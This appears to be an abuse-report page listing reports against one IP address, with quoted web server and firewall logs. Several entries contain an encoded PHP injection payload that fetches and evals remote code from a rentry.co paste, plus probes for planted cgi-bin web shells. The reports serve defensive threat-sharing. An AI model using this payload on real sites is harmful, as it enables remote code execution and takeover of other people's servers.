gu-alvareza
2024-10-17 07:05:17
(1 month ago)
PHP.URI.Code.Injection
SQL Injection
Web App Attack
0xffffffff
2024-10-17 04:15:07
(1 month ago)
[2024-10-17 07:15:04.510421] [authz_core:error] [pid 4032988:tid 136937532819136] [client 154.38.185 ... show more [2024-10-17 07:15:04.510421] [authz_core:error] [pid 4032988:tid 136937532819136] [client 154.38.185.190:0] AH01630: client denied by server configuration: /var/www/*/wp-22.php, referer http://*//wp-22.php?sfilename=admin.php&sfilecontent=<?php%20function%20get($url)%20{%20$ch%20=%20curl_init();%20curl_setopt($ch,%20CURLOPT_HEADER,%200);%20curl_setopt($ch,%20CURLOPT_RETURNTRANSFER,%201);%20curl_setopt($ch,%20CURLOPT_URL,%20$url);%20$data%20=%20curl_exec($ch);%20curl_close($ch);%20return%20$data;%20}%20$ok%20=%20%27?>%27;%20eval("$ok"%20.%20get(%27https://rentry.co/zokvg2mi/raw%27));%20?>&supfiles=admin.php , error_notes:double-slash , URI:'/wp-22.php?sfilename=admin.php&sfilecontent=<?php%20function%20get($url)%20{%20$ch%20=%20curl_init();%20curl_setopt($ch,%20CURLOPT_HEADER,%200);%20curl_setopt($ch,%20CURLOPT_RETURNTRANSFER,%201);%20curl_setopt($ch,%20CURLOPT_URL,%20$url);%20$data%20=%20curl_exec($ch);%20curl_close($ch);%20return%20$data;%20}%20$ok%20=%20%27?>%27;%20eval("$ok"%20.%20get(%27https://rentry.co/ show less
Bad Web Bot
Web App Attack
paulshipley.com.au
2024-10-17 00:12:06
(1 month ago)
angleseaarthouse.com.au:443 154.38.185.190 - - [17/Oct/2024:11:06:30 +1100] "GET /wp-22.php?sfilenam ... show more angleseaarthouse.com.au:443 154.38.185.190 - - [17/Oct/2024:11:06:30 +1100] "GET /wp-22.php?sfilename=admin.php&sfilecontent=<?php%20function%20get($url)%20{%20$ch%20=%20curl_init();%20curl_setopt($ch,%20CURLOPT_HEADER,%200);%20curl_setopt($ch,%20CURLOPT_RETURNTRANSFER,%201);%20curl_setopt($ch,%20CURLOPT_URL,%20$url);%20$data%20=%20curl_exec($ch);%20curl_close($ch);%20return%20$data;%20}%20$ok%20=%20%27?>%27;%20eval(\"$ok\"%20.%20get(%27https://rentry.co/zokvg2mi/raw%27));%20?>&supfiles=admin.php HTTP/1.1" 403 3898 "http://angleseaarthouse.com.au//wp-22.php?sfilename=admin.php&sfilecontent=<?php%20function%20get($url)%20{%20$ch%20=%20curl_init();%20curl_setopt($ch,%20CURLOPT_HEADER,%200);%20curl_setopt($ch,%20CURLOPT_RETURNTRANSFER,%201);%20curl_setopt($ch,%20CURLOPT_URL,%20$url);%20$data%20=%20curl_exec($ch);%20curl_close($ch);%20return%20$data;%20}%20$ok%20=%20%27?>%27;%20eval(\"$ok\"%20.%20get(%27https://rentry.co/zokvg2mi/raw%27));%20?>&supfiles=admin.php" "Go-http-client/1.1"
angl
... show less
Web App Attack
Apache
2024-10-16 05:03:04
(1 month ago)
(mod_security) mod_security (id:20000010) triggered by 154.38.185.190 (US/United States/vmi2170713.c ... show more (mod_security) mod_security (id:20000010) triggered by 154.38.185.190 (US/United States/vmi2170713.contaboserver.net): 5 in the last 300 secs show less
Brute-Force
Web App Attack
COMAITE
2024-10-15 23:50:30
(1 month ago)
Multiple web server 400 error codes from same source ip 154.38.185.190.
Web App Attack
Swiptly
2024-10-12 03:40:44
(1 month ago)
Multiple critical ModSecurity events
...
Web Spam
Bad Web Bot
london2038.com
2024-10-12 03:10:46
(1 month ago)
Probing for exploits
154.38.185.190 - - [12/Oct/2024:05:10:42 +0200] "GET //wp-22.php?sfilenam ... show more Probing for exploits
154.38.185.190 - - [12/Oct/2024:05:10:42 +0200] "GET //wp-22.php?sfilename=admin.php&sfilecontent=<?php%20function%20get($url)%20{%20$ch%20=%20curl_init();%20curl_setopt($ch,%20CURLOPT_HEADER,%200);%20curl_setopt($ch,%20CURLOPT_RETURNTRANSFER,%201);%20curl_setopt($ch,%20CURLOPT_URL,%20$url);%20$data%20=%20curl_exec($ch);%20curl_close($ch);%20return%20$data;%20}%20$ok%20=%20%27?>%27;%20eval(\x22$ok\x22%20.%20get(%27https://rentry.co/zokvg2mi/raw%27));%20?>&supfiles=admin.php HTTP/1.1" 301 169 "-" "Go-http-client/1.1"
154.38.185.190 - - [12/Oct/2024:05:10:43 +0200] "GET //rindex.php?action=add¶meter=admin.php%7Chttps://rentry.co/3fpi77xv/raw HTTP/1.1" 422 0 "-" "Go-http-client/1.1" show less
Hacking
Web App Attack
Ba-Yu
2024-10-10 07:17:44
(2 months ago)
General hacking/exploits/scanning
Web Spam
Hacking
Brute-Force
Exploited Host
Web App Attack
Anonymous
2024-10-10 06:32:43
(2 months ago)
Fail2Ban apache-noscript
Bad Web Bot
cmbplf
2024-10-10 06:25:45
(2 months ago)
200 requests to */.well-known/acme-challenge/*.php
Brute-Force
Bad Web Bot
robotstxt
2024-10-10 06:22:06
(2 months ago)
154.38.185.190 - - [10/Oct/2024:06:20:53 +0000] "GET //cgi-bin/class_api.php HTTP/2.0" 404 20 "http: ... show more 154.38.185.190 - - [10/Oct/2024:06:20:53 +0000] "GET //cgi-bin/class_api.php HTTP/2.0" 404 20 "http://www.wppodcast.org//cgi-bin/class_api.php#888xyz999" rt="0.072" "Go-http-client/2.0" "-" h="www.wppodcast.org" sn="www.wppodcast.org" ru="//cgi-bin/class_api.php" u="/index.php" ucs="-" ua="unix:/var/run/php/wppodcast82.sock" us="301" uct="0.000" urt="0.073"
154.38.185.190 - - [10/Oct/2024:06:20:53 +0000] "GET //cgi-bin/class_api.php HTTP/2.0" 404 20 "http://www.wppodcast.org//cgi-bin/class_api.php#888xyz999" "Go-http-client/2.0" "-"
154.38.185.190 - - [10/Oct/2024:06:21:20 +0000] "GET //cgi-bin/moon.php HTTP/2.0" 404 20 "http://www.wppodcast.org//cgi-bin/moon.php" rt="0.072" "Go-http-client/2.0" "-" h="www.wppodcast.org" sn="www.wppodcast.org" ru="//cgi-bin/moon.php" u="/index.php" ucs="-" ua="unix:/var/run/php/wppodcast82.sock" us="301" uct="0.000" urt="0.071"
154.38.185.190 - - [10/Oct/2024:06:21:46 +0000] "GET //cgi-bin/sgd.php HTTP/2.0" 404 20 "http://www.wppodcast.org//cgi-bin/sgd
... show less
Bad Web Bot
rnl
2024-10-10 04:17:54
(2 months ago)
2024/10/10 05:17:35 [error] 32687#0: *13838998 open() "/var/www/host/htdocs/cgi-bin/class_api.php" f ... show more 2024/10/10 05:17:35 [error] 32687#0: *13838998 open() "/var/www/host/htdocs/cgi-bin/class_api.php" failed (2: No such file or directory), client: 154.38.185.190, server: host.[munged], request: "GET //cgi-bin/class_api.php HTTP/1.1", host: "host.[munged]"
2024/10/10 05:17:54 [error] 32686#0: *13839045 open() "/var/www/host/htdocs/cgi-bin/moon.php" failed (2: No such file or directory), client: 154.38.185.190, server: host.[munged], request: "GET //cgi-bin/moo
... show less
Web App Attack
FeG Deutschland
2024-10-10 00:06:01
(2 months ago)
Looking for CMS/PHP/SQL vulnerablilities - 13
Exploited Host
Web App Attack
el-brujo
2024-10-09 23:57:14
(2 months ago)
Cloudflare WAF: Request Path: //general.php Request Query: ?pd=1&mapname=admin.php&a=vx000&dstr=<?ph ... show more Cloudflare WAF: Request Path: //general.php Request Query: ?pd=1&mapname=admin.php&a=vx000&dstr=<?php%20function%20get($url)%20{%20$ch%20=%20curl_init();%20curl_setopt($ch,%20CURLOPT_HEADER,%200);%20curl_setopt($ch,%20CURLOPT_RETURNTRANSFER,%201);%20curl_setopt($ch,%20CURLOPT_URL,%20$url);%20$data%20=%20curl_exec($ch);%20curl_close($ch);%20return%20$data;%20}%20$ok%20=%20%27?>%27;%20eval("$ok"%20.%20get(%27https://rentry.co/zokvg2mi/raw%27));%20?> Host: ns2.elhacker.net userAgent: Go-http-client/1.1 Action: log Source: firewallManaged ASN Description: NL-811-40021 Country: US Method: GET Timestamp: 2024-10-09T23:57:14Z ruleId: 0f2da91cec674eb58006929e824b817c. Report generated by Cloudflare-WAF-to-AbuseIPDB (https://github.com/MHG-LAB/Cloudflare-WAF-to-AbuseIPDB). show less
Hacking
SQL Injection
Web App Attack
noxtec GmbH
2024-10-09 23:51:36
(2 months ago)
(apache-useragents) Failed apache-useragents trigger with match [redacted] from 154.38.185.190 (US/U ... show more (apache-useragents) Failed apache-useragents trigger with match [redacted] from 154.38.185.190 (US/United States/vmi2170713.contaboserver.net) show less
Bad Web Bot